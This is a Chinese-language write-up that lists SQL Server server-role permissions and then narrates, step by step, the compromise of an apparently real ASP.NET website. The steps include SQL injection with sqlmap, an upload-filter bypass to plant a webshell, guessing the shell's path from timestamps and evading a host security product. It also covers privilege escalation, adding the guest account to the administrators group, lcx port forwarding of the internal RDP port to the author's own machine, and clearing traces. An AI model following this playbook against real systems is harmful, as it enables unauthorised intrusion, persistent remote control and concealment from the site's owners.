先羅列出sql server 角色用戶的權限
按照從最低級別角色(bulkadmin)到最高級別角色(sysadmin)的順序進行描述:
1.bulkadmin:這個角色可以運行BULK INSERT語句.該語句允許從文本文件中將數據導入到SQL Server2008數據庫中,為需要執行大容量插入到數據庫的域帳號而設計.
2.dbcreator:這個角色可以創建,更改,刪除和還原任何數據庫.不僅適合助理DBA角色,也可能適合開發人員角色.
3.diskadmin:這個角色用於管理磁盤文件,比如鏡像數據庫和添加備份設備.適合助理DBA
4.processadmin:SQL Server 2008可以同時多進程處理.這個角色可以結束進程(在SQL Server 2008中稱為"刪除")
5.public:有兩大特點:第一,初始狀態時沒有權限;第二,所有數據庫用戶都是它的成員
6.securityadmin:這個角色將管理登錄名及其屬性.可以授權,拒絕和撤銷服務器級/數據庫級權限.可以重置登錄名和密碼
7.serveradmin:這個角色可以更改服務器范圍的配置選項和關閉服務器
8.setupadmin:為需要管理聯接服務器和控制啟動的存儲過程的用戶而設計.
9.sysadmin:這個角色有權在SQL Server 2008 中執行任何操作.
第一步先找到了網站的新聞頁通過aspx 后綴結尾 判斷 基本信息 windows系統 ,數據庫可能是mssql
嘗試 id=1/0 報語法錯誤 410 /應用程序種的服務器錯誤.... 顯而易見是mssql 數據庫 並且存在sql注入
第二步 再去查他的ip以及網站信息 發現只是地方服務器 沒有大廠商的雲服務器判斷不存在雲waf (如果有ip被封了可以換代理ip) 可以直接上工具
第三步 直接sqlmap 跑出表和數據 角色權限public自定義的很低 繼續信息收集
第四步 發現前台沒什么可利用的信息 先寫腳本爬蟲 得到網站基本目錄 和資源存放地址和一些規則 在上御劍掃描沒什么有用信息
第五步 還可以利用強大的搜索引擎 利用google hack 語法 搜索試試 site: *.xxx.com 登錄 成功搜索到后台地址
第六步 打開頁面地址 通過和前台規則比對 確認是后台地址 輸入sqlmap 獲取用戶名信息登錄上去
第七步 尋找上傳點找到select 選擇框的上傳功能 但發現只能上傳db 文件 其他文件后綴會自動修改 認真整理他的邏輯 在進入上傳點前一個一面
有url 請求 type=db 審查元素發現 select選擇框 內 option 元素 <value=db> <value=txt> 由此可以確定他的邏輯 通過選擇框來選擇執行上面邏輯和確認上傳格式文件 直接篡改 成asa (aspx被禁止了) 成功上傳
第八步 發現上傳成功沒有回顯無法確定路徑和文件名 但是選擇img type上傳后回顯 可以確定上傳目錄 通過圖片命名格式 img201509246518.png 可以猜測命名規則 img 是類型 2015.. 是今天日期 后面可能是當前時間戳 我只需要確定后門的時間戳就行了 寫個js腳本發送10次上傳木馬的請求 同時記錄請求時間 通過第1次 時間 和第10次 時間 相減 得到 的時間區間 有十個馬 通過遍歷這個區間 成功得到相應的就是馬的地址
第九步 打開大馬查看組件 發現 cmd 和net 組件都被刪了 探測后台進程有服務端的安全狗 通過大馬上傳net,cmd 組件到有執行權限的目錄 比如當前的回收站 執行systeminfo 得到打的補丁數 只有4個 上傳免殺pr 利用內存溢出直接提權 把來賓用戶設置密碼加入管理員組
第十步 輸入 netatst -ano 發現80端口並不是原地址 有監聽地址 通過查詢發現他是個內網地址 可以確認通過外網把內網的80端口做了映射 上傳lcx 做端口轉發 本機執行 lcx -listen 3000 3388 監聽 3000 映射到3388 端口 webshell 機子上執行 -slave 我的ip 3000 192.xxx (內網ip) 3389 轉發到我的3000端口 本機打開遠程連接 輸入 127.0.0.1:3388 輸入剛剛修改密碼的來賓用戶 連接webshell 的機子 完美控制 。
第十一步 清理痕跡退出 把漏洞提交到漏洞平台。
對此站滲透的思考
1.可以直接利用掃描工具 wvs appscan webinspect jsky 極光等
2. 對結果就行定向滲透測試
3.shell 方法 上傳,包含,命令執行,備份。
4.提權先看打了什么補丁 在看安裝的第三方應用 通過ms漏洞提權 和應用提權
5.在擁有webshell 情況下 利用lcx 端口轉發突破內網限制
6.信息收集很重要